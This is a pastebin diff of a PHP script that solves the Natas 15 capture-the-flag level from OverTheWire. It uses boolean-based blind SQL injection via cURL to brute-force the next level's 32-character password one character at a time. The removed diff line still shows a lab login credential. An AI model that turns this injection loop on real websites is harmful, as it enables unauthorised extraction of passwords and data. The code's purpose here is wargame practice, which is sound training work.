SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | ||
| 3 | $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22%_PWD_%"; | |
| 4 | $alphabet = array_merge(range('a', 'z'), range('A', 'Z'), range(0, 9));
| |
| 5 | $opt = array( | |
| 6 | CURLOPT_RETURNTRANSFER => true, | |
| 7 | - | CURLOPT_USERPWD => "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J", |
| 7 | + | CURLOPT_USERPWD => "natas15:<censored>", |
| 8 | CURLAUTH_ANY => true, | |
| 9 | ); | |
| 10 | ||
| 11 | echo "============ INIT BREAKFORCE ATTEMPT =============<br />"; | |
| 12 | echo "BASE URL: ".$url."<br />"; | |
| 13 | echo "ALPHABET: ".implode(", ", $alphabet)."<br />";
| |
| 14 | ||
| 15 | $pwdchars = array(); | |
| 16 | ||
| 17 | $ch = curl_init(); | |
| 18 | foreach ($alphabet as $char) {
| |
| 19 | $opt[CURLOPT_URL] = str_replace("_PWD_", $char, $url);
| |
| 20 | curl_setopt_array($ch, $opt); | |
| 21 | $response = curl_exec($ch); | |
| 22 | if (strpos($response, "exists") !== false) {
| |
| 23 | $pwdchars []= $char; | |
| 24 | } | |
| 25 | }; | |
| 26 | echo "=====================================<br />"; | |
| 27 | echo "CHARS FOUND: " . implode(", ", $pwdchars);
| |
| 28 | ||
| 29 | $pass = ""; | |
| 30 | $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22_PWD_%"; | |
| 31 | file_put_contents('php://stdout', '$pwdchars = '.print_r(implode(", ", $pwdchars), TRUE).PHP_EOL);
| |
| 32 | while (strlen($pass) != 32) {
| |
| 33 | foreach ($pwdchars as $char) {
| |
| 34 | $attempt = $pass . $char; | |
| 35 | $opt[CURLOPT_URL] = str_replace("_PWD_", $attempt, $url);
| |
| 36 | curl_setopt_array($ch, $opt); | |
| 37 | $response = curl_exec($ch); | |
| 38 | if (strpos($response, "exists") !== false) {
| |
| 39 | $pass .= $char; | |
| 40 | file_put_contents('php://stdout', '$pass = '.print_r($pass, TRUE).PHP_EOL);
| |
| 41 | } | |
| 42 | } | |
| 43 | } |
